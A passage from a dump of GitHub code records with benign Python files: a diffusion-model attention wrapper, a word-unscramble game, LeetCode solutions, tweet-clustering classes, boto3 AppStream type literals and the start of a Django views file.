model_self.reshape_heads_to_batch_dim(q)\n k = model_self.reshape_heads_to_batch_dim(k)\n v = model_self.reshape_heads_to_batch_dim(v)\n\n sim = torch.einsum(\"b i d, b j d -> b i j\", q, k) * model_self.scale\n\n if mask is not None:\n mask = mask.reshape(batch_size, -1)\n max_neg_value = -torch.finfo(sim.dtype).max\n mask = mask[:, None, :].repeat(h, 1, 1)\n sim.masked_fill_(~mask, max_neg_value)\n\n # attention, what we cannot get enough of\n attn = sim.softmax(dim=-1)\n if self.enbale_attn_controller_changes:\n attn = self.controller(attn, is_cross, place_in_unet)\n \n if is_cross and self.prompt_mixing is not None and context[1] is not None:\n attn = self.prompt_mixing.get_cross_attn(self, self.diff_step, attn, place_in_unet, batch_size)\n\n if not is_cross and (not self.model_config[\"low_resource\"] or not self.uncond_pred) and self.prompt_mixing is not None:\n attn = self.prompt_mixing.get_self_attn(self, self.diff_step, attn, place_in_unet, batch_size)\n\n out = torch.einsum(\"b i j, b j d -> b i d\", attn, v)\n out = model_self.reshape_batch_dim_to_heads(out)\n return to_out(out)\n\n return forward\n\n def register_recr(net_, count, place_in_unet):\n if net_.__class__.__name__ == 'CrossAttention':\n net_.forward = ca_forward(net_, place_in_unet)\n return count + 1\n elif hasattr(net_, 'children'):\n for net__ in net_.children():\n count = register_recr(net__, count, place_in_unet)\n return count\n\n cross_att_count = 0\n sub_nets = self.model.unet.named_children()\n for net in sub_nets:\n if \"down\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"down\")\n elif \"up\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"up\")\n elif \"mid\" in net[0]:\n cross_att_count += register_recr(net[1], 0, \"mid\")\n self.controller.num_att_layers = cross_att_count\n\n\n def get_text_embedding(self, prompt: List[str], max_length=None, truncation=True):\n text_input = self.model.tokenizer(\n prompt,\n padding=\"max_length\",\n max_length=self.model.tokenizer.model_max_length if max_length is None else max_length,\n truncation=truncation,\n return_tensors=\"pt\",\n )\n text_embeddings = self.model.text_encoder(text_input.input_ids.to(self.device))[0]\n max_length = text_input.input_ids.shape[-1]\n return text_embeddings, max_length\n\n\n @torch.no_grad()\n def forward(self, prompt: List[str], latent: Optional[torch.FloatTensor] = None,\n other_prompt: List[str] = None, post_background = False, orig_all_latents = None, orig_mask = None,\n uncond_embeddings=None, start_time=51, return_type='image'):\n self.enbale_attn_controller_changes = True\n batch_size = len(prompt)\n\n text_embeddings, max_length = self.get_text_embedding(prompt)\n if uncond_embeddings is None:\n uncond_embeddings_, _ = self.get_text_embedding([\"\"] * batch_size, max_length=max_length, truncation=False)\n else:\n uncond_embeddings_ = None\n\n other_context = None\n if other_prompt is not None:\n other_text_embeddings, _ = self.get_text_embedding(other_prompt)\n other_context = other_text_embeddings\n\n latent, latents = self.init_latent(latent, batch_size)\n \n # set timesteps\n self.model.scheduler.set_timesteps(self.model_config[\"num_diffusion_steps\"])\n all_latents = []\n\n object_mask = None\n self.diff_step = 0\n for i, t in enumerate(tqdm(self.model.scheduler.timesteps[-start_time:])):\n if uncond_embeddings_ is None:\n context = [uncond_embeddings[i].expand(*text_embeddings.shape), text_embeddings]\n else:\n context = [uncond_embeddings_, text_embeddings]\n if not self.model_config[\"low_resource\"]:\n context = torch.cat(context)\n\n self.down_cross_index = 0\n self.mid_cross_index = 0\n self.up_cross_index = 0\n latents = self.diffusion_step(latents, context, t, other_context)\n\n if post_background and self.diff_step == self.args.background_blend_timestep:\n object_mask = Segmentor(self.controller,\n prompt,\n self.args.num_segments,\n self.args.background_segment_threshold,\n background_nouns=self.args.background_nouns)\\\n .get_background_mask(self.args.prompt.split(' ').index(\"{word}\") + 1)\n self.enbale_attn_controller_changes = False\n mask = object_mask.astype(np.bool8) + orig_mask.astype(np.bool8)\n mask = torch.from_numpy(mask).float().cuda()\n shape = (1, 1, mask.shape[0], mask.shape[1])\n mask = torch.nn.Upsample(size=(64, 64), mode='nearest')(mask.view(shape))\n mask_eroded = dilate(mask.cpu().numpy()[0, 0], np.ones((3, 3), np.uint8), iterations=1)\n mask = torch.from_numpy(mask_eroded).float().cuda().view(1, 1, 64, 64)\n latents = mask * latents + (1 - mask) * orig_all_latents[self.diff_step]\n\n all_latents.append(latents)\n self.diff_step += 1\n\n if return_type == 'image':\n image = self.latent2image(latents)\n else:\n image = latents\n \n return image, latent, all_latents, object_mask\n \n \n def show_last_cross_attention(self, res: int, from_where: List[str], prompts, select: int = 0):\n show_cross_attention(self.controller, res, from_where, prompts, tokenizer=self.model.tokenizer, select=select)","repo_name":"orpatashnik/local-prompt-mixing","sub_path":"src/diffusion_model_wrapper.py","file_name":"diffusion_model_wrapper.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"81"} +{"seq_id":"37734692637","text":"import random\nfrom typing import Tuple\nimport unscramble_functions as uf\n\nTEST = 'T'\nNORMAL = 'N'\nHINT = 'H'\nSECTION_HINT = 1\nMOVE_HINT = 2\n\n\ndef start_game() -> Tuple[str, str, str, str]:\n \"\"\"Return the start state, answer, mode, and section length of a new game.\n \"\"\"\n mode = get_mode()\n if in_test_mode(mode):\n answer, section_len = start_test_mode()\n elif in_hint_mode(mode):\n # Hint mode only works with a section length of 3\n games = ['CATDOGEMUFOX', 'WHOAREYOU', 'PIEEGGHAMOATBUNFIGJAM', 'ZIGZAG']\n answer = random.choice(games)\n section_len = uf.HINT_MODE_SECTION_LENGTH\n else:\n games = {'CATDOGEMUFOX': 3, 'ITISOK': 2, 'PYTHONORANGEWAFFLE': 6,\n 'CAKERICEKIWISOUPPIES': 4 , 'ROCKLAKE': 4}\n answer = random.choice(list(games.keys()))\n section_len = games[answer]\n state = generate_starting_point(answer, section_len)\n return state, answer, mode, section_len\n\n\ndef start_test_mode() -> Tuple[str, int]:\n \"\"\"Return the answer and section_len that the user wants to test with.\n \"\"\"\n answer = input('Enter the answer to use: ')\n prompt = 'Enter the section length to use: '\n section_len = input(prompt)\n while not (section_len.isdigit() and len(answer) % int(section_len) == 0):\n print('Invalid section length!')\n section_len = input(prompt)\n return answer, int(section_len)\n\n\ndef generate_starting_point(answer: str, section_len: int) -> str:\n \"\"\"Return a scrambled version of answer with section length section_len.\n\n >>> random.seed(42)\n >>> generate_starting_point('CATDOGFOXEMU', 3)\n 'ACTGODOXFMUE'\n \"\"\"\n starter = ''\n for i in range(len(answer) // section_len):\n section = list(answer[section_len * i:section_len * (i + 1)])\n random.shuffle(section)\n starter = starter + ''.join(section)\n return starter\n\n\ndef get_section_hint(state: str, answer: str) -> int:\n \"\"\"Return a random section number corresponding to a section of state that\n is not arranged the same as in answer.\n\n Precondition: Section length for state and answer is 3.\n\n >>> random.seed(42)\n >>> get_section_hint('CATDGOMUEXOF', 'CATDOGEMUFOX')\n 3\n >>> get_section_hint('CTADGOMUEXOF', 'CATDOGEMUFOX')\n 4\n \"\"\"\n section_nums = [i + 1\n for i in range(len(state) // uf.HINT_MODE_SECTION_LENGTH)]\n random.shuffle(section_nums)\n for section_num in section_nums:\n if not uf.check_section(state, answer, section_num,\n uf.HINT_MODE_SECTION_LENGTH):\n return section_num\n return 0 # should never get here\n\n\ndef is_valid_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode is a valid mode.\n\n >>> is_valid_mode('T')\n True\n >>> is_valid_mode('S')\n False\n \"\"\"\n return mode == TEST or mode == NORMAL or mode == HINT\n\n\ndef in_test_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode indicates the game is in test mode.\n\n >>> in_test_mode('T')\n True\n >>> in_test_mode('N')\n False\n \"\"\"\n return mode == TEST\n\n\ndef in_hint_mode(mode: str) -> bool:\n \"\"\"Return True if and only if mode indicates the game is in hint mode.\n\n >>> in_hint_mode('H')\n True\n >>> in_hint_mode('N')\n False\n \"\"\"\n return mode == HINT\n\n\ndef make_move(state: str, answer: str, section_num: int, move: str,\n section_len: int) -> str:\n \"\"\"Return the new game state after performing the game move specified by\n move on the section of state correspoding to section_num. If the move is\n checking, the specified section in the game state is compared to the \n same section in answer.\n The section length is given by section_len\n\n\n >>> make_move('TCADOGEMUFOX', 'CATDOGEMUFOX', 1, 'S', 3)\n 'CATDOGEMUFOX'\n >>> make_move('CATDOGUMEFOX', 'CATDOGEMUFOX', 3, 'C', 3)\n The section is incorrect\n 'CATDOGUMEFOX'\n \"\"\"\n if move == uf.CHECK:\n check_result = uf.check_section(state, answer, section_num, section_len)\n if check_result:\n print('The section is correct')\n else:\n print('The section is incorrect')\n else:\n state = uf.change_section(state, move, section_num, section_len)\n return state\n\n\ndef get_mode() -> str:\n \"\"\"Return a valid game mode entered by the user.\n \"\"\"\n prompt = 'Enter the mode to play [(T)est, (N)ormal, or (H)int]: '\n mode = input(prompt).upper()\n while not is_valid_mode(mode):\n print('Invalid mode!')\n mode = input(prompt).upper()\n return mode\n\n\ndef get_section_number(answer: str, section_len: int) -> int:\n \"\"\"Return a valid section number for answer as entered by the user\n based on the section_len.\n \"\"\"\n prompt = 'Enter a section number (1 - ' + \\\n str(uf.get_num_sections(answer, section_len)) + '): '\n section_num = input(prompt)\n while not (section_num.isdigit() and\n uf.is_valid_section(int(section_num), answer, section_len)):\n print('Invalid section number!')\n section_num = input(prompt)\n return int(section_num)\n\n\ndef get_move() -> str:\n \"\"\"Return a valid move entered by the user.\n \"\"\"\n msg = 'Enter a move for that section (C to check, S to shift, F to flip): '\n move = input(msg).upper()\n while not uf.is_valid_move(move):\n print('Invalid move!')\n move = input(msg).upper()\n return move\n\n\ndef get_hints(state: str, answer: str, mode: str, hint_type: str,\n section_num: int) -> int:\n \"\"\"Return 1 if a hint was given, and 0 if not. Prompt the user to answer\n whether they would like a hint of type hint_type if and only if mode\n indicates the game is in hint mode.\n\n If yes, generate the hint on how to rearrange state based on the current\n state and the asnwer (only using section_num if hint_type corresponds to \n a move hint) and print the hint.\n\n Preconditon: section_num is a valid section and the section length of state\n and answer is 3 if hint_type is MOVE_HINT.\n \"\"\"\n if in_hint_mode(mode):\n if hint_type == SECTION_HINT:\n hint = input('Enter Y if you want a section hint: ').upper()\n if hint == 'Y':\n print('Your section hint is: ' +\n str(get_section_hint(state, answer)))\n return 1\n elif hint_type == MOVE_HINT:\n hint = input('Enter Y if you want a move hint: ').upper()\n if hint == 'Y':\n print('Your move hint is: ' +\n uf.get_move_hint(state, answer, section_num))\n return 1\n return 0\n\n\ndef play_game(state: str, answer: str, mode: str, section_len: int) -> int:\n \"\"\"Return the number of moves taken to move from state and arrive at \n the correct answer given the mode and section_len.\n\n Run the main loop in game-mode mode, prompting the user for input and\n consequently updating state.\n \"\"\"\n moves = 0\n if in_test_mode(mode):\n print('Answer: ' + answer)\n\n while state != answer:\n print('Current state: ' + state)\n moves += get_hints(state, answer, mode, SECTION_HINT, -1)\n section_num = get_section_number(answer, section_len)\n moves += get_hints(state, answer, mode, MOVE_HINT, section_num)\n move = get_move()\n state = make_move(state, answer, section_num, move, section_len)\n moves += 1\n return moves\n\n\nif __name__ == '__main__':\n\n start_state, game_answer, game_mode, section_length = start_game()\n num_moves = play_game(start_state, game_answer, game_mode, section_length)\n print('You got the answer {0} in {1} moves!'.format(game_answer, num_moves))\n","repo_name":"mayushanmayurathan/unscrambled-game","sub_path":"unscramble_game.py","file_name":"unscramble_game.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74008854026","text":"#\n# @lc app=leetcode id=283 lang=python3\n#\n# [283] Move Zeroes\n#\nfrom typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n index = 0\n for i, n in enumerate(nums):\n if n != 0:\n nums[i], nums[index], index = nums[index], nums[i], index + 1\n\n\nif __name__ == '__main__':\n nums = [0, 1, 0, 3, 12]\n # nums = [0, 0, 0, 1]\n Solution().moveZeroes(nums)\n print(nums)\n","repo_name":"Alfonsxh/LeetCode-Challenge-python","sub_path":"LeetCode/Python/283.move-zeroes.py","file_name":"283.move-zeroes.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31999303454","text":"\nfrom utils import *\nfrom config import *\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom tqdm import tqdm\nfrom collections import Counter\n\n\n\nclass Tweet:\n def __init__(self, tweet_data):\n if 'text' in tweet_data.keys():\n self.text = preprocess_text(tweet_data['text'])\n self.tweet_type = self.get_type(tweet_data)\n\n if 'user' in tweet_data.keys():\n self.user = TwitterUser(tweet_data['user'])\n else:\n self.user = None\n self.get_geo_data(tweet_data)\n \n def set_vector(self, vec):\n self.vector = vec\n def get_type(self, data):\n if 'extended_tweet' in data.keys():\n self.is_extended = True\n self.extended_tweet = data['extended_tweet']\n if 'entities' in self.extended_tweet.keys():\n self.entities = self.extended_tweet['entities']\n else: self.is_extended = False\n if 'user' in data.keys(): \n if data['user']['screen_name'] == \"Retweeter\":\n return 'retweet'\n if data['user']['screen_name'] == \"TweetQuoter\":\n self.text = f\"{self.text} {preprocess_text(data['quoted_status'])}\"\n return 'quote'\n return 'normal'\n def get_geo_data(self, data):\n self.geo_locations = {}\n\n if \"geo\" in data.keys():\n self.geo_locations['geo'] = data[\"geo\"]\n elif \"coordinates\" in data.keys():\n self.geo_locations['coordinates'] = data[\"coordinates\"]\n elif \"place\" in data.keys():\n self.geo_locations['place'] = data[\"place\"]\n \n def __str__(self):\n return f\"Tweet object: type: {self.tweet_type}\"\n\n\n\n\nclass TwitterUser:\n def __init__(self, user_data):\n self.id = user_data['id']\n self.name = user_data['name']\n self.screen_name = user_data['screen_name']\n self.location = user_data['location']\n self.description = user_data['description']\n self.verified = user_data['verified']\n self.statuses_count = user_data['statuses_count']\n self.created_at = user_data['created_at']\n self.followers = user_data['followers_count']\n self.is_default = json.dumps(user_data).find('default_profile_image') != -1\n\n\n\nclass TweetData:\n def __init__(self, tweets, save_random_image=False):\n self.tweets = tweets\n self.cluster_counter = 0\n self.clusters = []\n self.metrics_counts = {\n 'retweets': 0,\n 'quotes': 0,\n 'media': 0,\n 'verified': 0,\n 'geo_tagged': 0,\n 'loc_or_place': 0\n }\n self.process_tweets()\n self.group_tweets()\n self.report()\n\n def process_tweets(self):\n print('Processing tweets started....')\n corpus = list(map(get_tweet_text, self.tweets))\n self.vectorizer = TfidfVectorizer(strip_accents='ascii', lowercase=True, stop_words='english')\n vector = self.vectorizer.fit_transform(corpus)\n images_downlaoded = 0\n for tweet in tqdm(self.tweets):\n tweet.set_vector(\n self.vectorizer.transform([tweet.text])\n )\n if tweet.tweet_type != 'normal':\n if tweet.tweet_type == 'retweet': self.metrics_counts['retweets'] += 1\n if tweet.tweet_type == 'quote': self.metrics_counts['quotes'] += 1\n if tweet.is_extended:\n if 'media' in tweet.entities:\n for image in tweet.entities['media']:\n if images_downlaoded == 0:\n print(image['media_url'])\n download_image(image['media_url'])\n images_downlaoded = 1\n self.metrics_counts['media'] += 1\n if len(tweet.geo_locations.keys()) > 0:\n if 'geo' in tweet.geo_locations.keys(): self.metrics_counts['geo_tagged'] += 1\n if any([(x in tweet.geo_locations.keys()) for x in ['coordinates', 'place']]): self.metrics_counts['loc_or_place'] += 1\n if tweet.user != None:\n if tweet.user.verified: self.metrics_counts['verified'] += 1\n \n def group_tweets(self):\n print('Grouping tweets started....')\n for tweet in tqdm(self.tweets):\n max_sim = 0\n if self.cluster_counter == 0:\n self.clusters.append(Cluster(0, tweet))\n self.cluster_counter += 1\n else:\n cluster_id = 0\n # try all clusters\n for cluster in self.clusters:\n cos_sim = cosine_similarity(cluster.vector, tweet.vector)\n \n if cos_sim > max_sim:\n max_sim = cos_sim\n cluster_id = cluster.id\n \n if self.cluster_counter < 10 and max_sim < 0.0005:\n self.clusters.append(Cluster(self.cluster_counter, tweet))\n self.cluster_counter += 1\n else:\n self.clusters[cluster_id].add_tweet(tweet)\n # print(f\"currently num of clusters: {self.cluster_counter}\")\n \n def report(self):\n print('Grouping finished!')\n print(f\"Num of clusters: {self.cluster_counter}\")\n print(f\"Num of tweets: {len(self.tweets)}\")\n tweet_lens = []\n for cluster in self.clusters:\n out = cluster.get_most_used_word()\n print(f\"most used word in cluster {cluster.id} is {out}\")\n tweet_lens.append(len(cluster.tweets))\n print(f\"num of tweets {len(cluster.tweets)}\")\n print(\"Groups formed: 10\")\n print(f\"Min size: {min(tweet_lens)}\")\n print(f\"Max size: {max(tweet_lens)}\")\n print(f\"Avg size: {sum(tweet_lens) / 10}\")\n\n print('Metrics')\n for key in self.metrics_counts:\n print(f\"{key}: {self.metrics_counts[key]}\")\n \n\n\nclass Cluster:\n def __init__(self, id, tweet):\n self.id = id\n self.vector = tweet.vector\n self.tweets = [tweet]\n self.users = [tweet.user]\n def update_vector(self, new_vec):\n self.vector = (self.vector + new_vec) / 2\n def add_tweet(self, tweet):\n self.tweets.append(tweet)\n self.update_vector(tweet.vector)\n def get_most_used_word(self):\n given_string = \"\"\n for tweet in self.tweets:\n given_string += tweet.text\n words = given_string.split()\n return Counter(words).most_common(3)\n \n","repo_name":"s-froghyar/ws-twitter-crawler","sub_path":"tweet_classes.py","file_name":"tweet_classes.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8291346057","text":"import gensim.downloader as api\nimport numpy as np\nimport torch.nn as nn\nimport torch\n\n\nclass EmbeddingLoader():\n def __init__(self, embedding_dim, pretrained_embedding_name=None):\n self.embedding_dim = embedding_dim\n\n if pretrained_embedding_name is not None:\n self.vectors = api.load(pretrained_embedding_name)\n self.embedding_dim = self.vectors.vector_size\n else:\n self.vectors = None\n\n\n def load_embedding(self, index2token):\n self.emb_weights = np.random.normal(scale=0.6, size=(len(index2token), self.embedding_dim))\n\n if self.vectors is not None:\n for index, token in index2token.items():\n embedding = np.zeros(self.embedding_dim)\n for label in token:\n if label in self.vectors:\n embedding += self.vectors[label]\n else:\n embedding += np.random.normal(scale=0.2, size=self.embedding_dim)\n\n # Get average of the embeddings of the token \"phrase\"\n embedding /= len(token)\n\n self.emb_weights[index] = embedding\n\n\n def get_embedding_layer(self, freeze=False):\n emb_layer = nn.Embedding.from_pretrained(torch.tensor(self.emb_weights, dtype=torch.float))\n\n if freeze:\n emb_layer.weight.requires_grad = False\n else:\n emb_layer.weight.requires_grad = True\n\n return emb_layer","repo_name":"sander102907/autoencoder_program_synthesis","sub_path":"autoencoder_program_synthesis/model_utils/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10327364099","text":"\"\"\"\nType annotations for appstream service literal definitions.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_appstream/literals.html)\n\nUsage::\n\n ```python\n from mypy_boto3_appstream.literals import AccessEndpointTypeType\n\n data: AccessEndpointTypeType = \"STREAMING\"\n ```\n\"\"\"\nimport sys\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\n \"AccessEndpointTypeType\",\n \"ActionType\",\n \"AppVisibilityType\",\n \"ApplicationAttributeType\",\n \"AuthenticationTypeType\",\n \"CertificateBasedAuthStatusType\",\n \"DescribeDirectoryConfigsPaginatorName\",\n \"DescribeFleetsPaginatorName\",\n \"DescribeImageBuildersPaginatorName\",\n \"DescribeImagesPaginatorName\",\n \"DescribeSessionsPaginatorName\",\n \"DescribeStacksPaginatorName\",\n \"DescribeUserStackAssociationsPaginatorName\",\n \"DescribeUsersPaginatorName\",\n \"FleetAttributeType\",\n \"FleetErrorCodeType\",\n \"FleetStartedWaiterName\",\n \"FleetStateType\",\n \"FleetStoppedWaiterName\",\n \"FleetTypeType\",\n \"ImageBuilderStateChangeReasonCodeType\",\n \"ImageBuilderStateType\",\n \"ImageStateChangeReasonCodeType\",\n \"ImageStateType\",\n \"ListAssociatedFleetsPaginatorName\",\n \"ListAssociatedStacksPaginatorName\",\n \"MessageActionType\",\n \"PermissionType\",\n \"PlatformTypeType\",\n \"PreferredProtocolType\",\n \"SessionConnectionStateType\",\n \"SessionStateType\",\n \"StackAttributeType\",\n \"StackErrorCodeType\",\n \"StorageConnectorTypeType\",\n \"StreamViewType\",\n \"UsageReportExecutionErrorCodeType\",\n \"UsageReportScheduleType\",\n \"UserStackAssociationErrorCodeType\",\n \"VisibilityTypeType\",\n)\n\nAccessEndpointTypeType = Literal[\"STREAMING\"]\nActionType = Literal[\n \"CLIPBOARD_COPY_FROM_LOCAL_DEVICE\",\n \"CLIPBOARD_COPY_TO_LOCAL_DEVICE\",\n \"DOMAIN_PASSWORD_SIGNIN\",\n \"DOMAIN_SMART_CARD_SIGNIN\",\n \"FILE_DOWNLOAD\",\n \"FILE_UPLOAD\",\n \"PRINTING_TO_LOCAL_DEVICE\",\n]\nAppVisibilityType = Literal[\"ALL\", \"ASSOCIATED\"]\nApplicationAttributeType = Literal[\"LAUNCH_PARAMETERS\", \"WORKING_DIRECTORY\"]\nAuthenticationTypeType = Literal[\"API\", \"AWS_AD\", \"SAML\", \"USERPOOL\"]\nCertificateBasedAuthStatusType = Literal[\n \"DISABLED\", \"ENABLED\", \"ENABLED_NO_DIRECTORY_LOGIN_FALLBACK\"\n]\nDescribeDirectoryConfigsPaginatorName = Literal[\"describe_directory_configs\"]\nDescribeFleetsPaginatorName = Literal[\"describe_fleets\"]\nDescribeImageBuildersPaginatorName = Literal[\"describe_image_builders\"]\nDescribeImagesPaginatorName = Literal[\"describe_images\"]\nDescribeSessionsPaginatorName = Literal[\"describe_sessions\"]\nDescribeStacksPaginatorName = Literal[\"describe_stacks\"]\nDescribeUserStackAssociationsPaginatorName = Literal[\"describe_user_stack_associations\"]\nDescribeUsersPaginatorName = Literal[\"describe_users\"]\nFleetAttributeType = Literal[\n \"DOMAIN_JOIN_INFO\",\n \"IAM_ROLE_ARN\",\n \"SESSION_SCRIPT_S3_LOCATION\",\n \"USB_DEVICE_FILTER_STRINGS\",\n \"VPC_CONFIGURATION\",\n \"VPC_CONFIGURATION_SECURITY_GROUP_IDS\",\n]\nFleetErrorCodeType = Literal[\n \"DOMAIN_JOIN_ERROR_ACCESS_DENIED\",\n \"DOMAIN_JOIN_ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED\",\n \"DOMAIN_JOIN_ERROR_FILE_NOT_FOUND\",\n \"DOMAIN_JOIN_ERROR_INVALID_PARAMETER\",\n \"DOMAIN_JOIN_ERROR_LOGON_FAILURE\",\n \"DOMAIN_JOIN_ERROR_MORE_DATA\",\n \"DOMAIN_JOIN_ERROR_NOT_SUPPORTED\",\n \"DOMAIN_JOIN_ERROR_NO_SUCH_DOMAIN\",\n \"DOMAIN_JOIN_INTERNAL_SERVICE_ERROR\",\n \"DOMAIN_JOIN_NERR_INVALID_WORKGROUP_NAME\",\n \"DOMAIN_JOIN_NERR_PASSWORD_EXPIRED\",\n \"DOMAIN_JOIN_NERR_WORKSTATION_NOT_STARTED\",\n \"FLEET_INSTANCE_PROVISIONING_FAILURE\",\n \"FLEET_STOPPED\",\n \"IAM_SERVICE_ROLE_IS_MISSING\",\n \"IAM_SERVICE_ROLE_MISSING_DESCRIBE_SECURITY_GROUPS_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_DESCRIBE_SUBNET_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_ENI_CREATE_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_ENI_DELETE_ACTION\",\n \"IAM_SERVICE_ROLE_MISSING_ENI_DESCRIBE_ACTION\",\n \"IGW_NOT_ATTACHED\",\n \"IMAGE_NOT_FOUND\",\n \"INTERNAL_SERVICE_ERROR\",\n \"INVALID_SUBNET_CONFIGURATION\",\n \"MACHINE_ROLE_IS_MISSING\",\n \"NETWORK_INTERFACE_LIMIT_EXCEEDED\",\n \"SECURITY_GROUPS_NOT_FOUND\",\n \"STS_DISABLED_IN_REGION\",\n \"SUBNET_HAS_INSUFFICIENT_IP_ADDRESSES\",\n \"SUBNET_NOT_FOUND\",\n]\nFleetStartedWaiterName = Literal[\"fleet_started\"]\nFleetStateType = Literal[\"RUNNING\", \"STARTING\", \"STOPPED\", \"STOPPING\"]\nFleetStoppedWaiterName = Literal[\"fleet_stopped\"]\nFleetTypeType = Literal[\"ALWAYS_ON\", \"ELASTIC\", \"ON_DEMAND\"]\nImageBuilderStateChangeReasonCodeType = Literal[\"IMAGE_UNAVAILABLE\", \"INTERNAL_ERROR\"]\nImageBuilderStateType = Literal[\n \"DELETING\",\n \"FAILED\",\n \"PENDING\",\n \"PENDING_QUALIFICATION\",\n \"REBOOTING\",\n \"RUNNING\",\n \"SNAPSHOTTING\",\n \"STOPPED\",\n \"STOPPING\",\n \"UPDATING\",\n \"UPDATING_AGENT\",\n]\nImageStateChangeReasonCodeType = Literal[\n \"IMAGE_BUILDER_NOT_AVAILABLE\", \"IMAGE_COPY_FAILURE\", \"INTERNAL_ERROR\"\n]\nImageStateType = Literal[\n \"AVAILABLE\", \"COPYING\", \"CREATING\", \"DELETING\", \"FAILED\", \"IMPORTING\", \"PENDING\"\n]\nListAssociatedFleetsPaginatorName = Literal[\"list_associated_fleets\"]\nListAssociatedStacksPaginatorName = Literal[\"list_associated_stacks\"]\nMessageActionType = Literal[\"RESEND\", \"SUPPRESS\"]\nPermissionType = Literal[\"DISABLED\", \"ENABLED\"]\nPlatformTypeType = Literal[\"AMAZON_LINUX2\", \"WINDOWS\", \"WINDOWS_SERVER_2016\", \"WINDOWS_SERVER_2019\"]\nPreferredProtocolType = Literal[\"TCP\", \"UDP\"]\nSessionConnectionStateType = Literal[\"CONNECTED\", \"NOT_CONNECTED\"]\nSessionStateType = Literal[\"ACTIVE\", \"EXPIRED\", \"PENDING\"]\nStackAttributeType = Literal[\n \"ACCESS_ENDPOINTS\",\n \"EMBED_HOST_DOMAINS\",\n \"FEEDBACK_URL\",\n \"IAM_ROLE_ARN\",\n \"REDIRECT_URL\",\n \"STORAGE_CONNECTORS\",\n \"STORAGE_CONNECTOR_GOOGLE_DRIVE\",\n \"STORAGE_CONNECTOR_HOMEFOLDERS\",\n \"STORAGE_CONNECTOR_ONE_DRIVE\",\n \"STREAMING_EXPERIENCE_SETTINGS\",\n \"THEME_NAME\",\n \"USER_SETTINGS\",\n]\nStackErrorCodeType = Literal[\"INTERNAL_SERVICE_ERROR\", \"STORAGE_CONNECTOR_ERROR\"]\nStorageConnectorTypeType = Literal[\"GOOGLE_DRIVE\", \"HOMEFOLDERS\", \"ONE_DRIVE\"]\nStreamViewType = Literal[\"APP\", \"DESKTOP\"]\nUsageReportExecutionErrorCodeType = Literal[\n \"ACCESS_DENIED\", \"INTERNAL_SERVICE_ERROR\", \"RESOURCE_NOT_FOUND\"\n]\nUsageReportScheduleType = Literal[\"DAILY\"]\nUserStackAssociationErrorCodeType = Literal[\n \"DIRECTORY_NOT_FOUND\", \"INTERNAL_ERROR\", \"STACK_NOT_FOUND\", \"USER_NAME_NOT_FOUND\"\n]\nVisibilityTypeType = Literal[\"PRIVATE\", \"PUBLIC\", \"SHARED\"]\n","repo_name":"chrishollinworth/vscode-boto3-intellisense","sub_path":"typings/mypy_boto3_appstream/literals.pyi","file_name":"literals.pyi","file_ext":"pyi","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"26124792598","text":"from collections import defaultdict\n# def minimumAbsDifference(arr):\n# # works but inefficient and times out\n# diffs = defaultdict(list)\n# length = len(arr)\n# for i in range(length):\n# for j in range(length):\n# if j > i:\n# a = arr[i]\n# b = arr[j]\n# if a < b:\n# diffs[abs(b-a)].append([a, b])\n# else: \n# diffs[abs(b-a)].append([b, a])\n# minimum = min(list(diffs.keys()))\n# res = sorted(diffs[minimum], key = lambda x: x[0])\n# return res\n\ndef minimumAbsDifference(arr):\n arr.sort()\n # rev = sorted(arr, reverse=True)\n minimum = max(arr)\n for x in range(len(arr) - 1):\n a = arr[x]\n b = arr[x + 1]\n diff = abs(b - a)\n if diff < minimum: minimum = diff\n\n # minimum = min([abs(b - a) for b, a in zip(arr,rev)], abs(arr[-2] - arr[-1]), abs(arr[1] - arr[0]))\n i = 0\n j = 1\n pairs = []\n while j < len(arr):\n b = arr[j]\n a = arr[i]\n diff = abs(b - a)\n if diff > minimum:\n i+=1\n elif diff < minimum:\n j+=1\n else:\n pairs.append([a, b])\n j+=1\n if i == j:\n j+=1\n return pairs\n \n\nif __name__ == \"__main__\":\n test = [4,2,1,3] # ==> [[1,2],[2,3],[3,4]]\n # test = [1,3,6,10,15] # ==> [[1,3]]\n # test = [40,11,26,27,-20] # ==> [[26,27]]\n res = minimumAbsDifference(test) \n print(res)","repo_name":"kanuff/leetcode","sub_path":"1200.py","file_name":"1200.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71080421386","text":"from audioop import max\nfrom numbers import Real\nfrom operator import is_\n\nfrom django.shortcuts import render,redirect, render_to_response\nfrom .models import *\nfrom .forms import *\nfrom .coremodule import *\n# from django_tables2 import RequestConfig\nfrom django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\n\n # ===============================================================\n # ===============================================================\ndef run_schedule_Ndays(n):\n dayList = ['일요일', 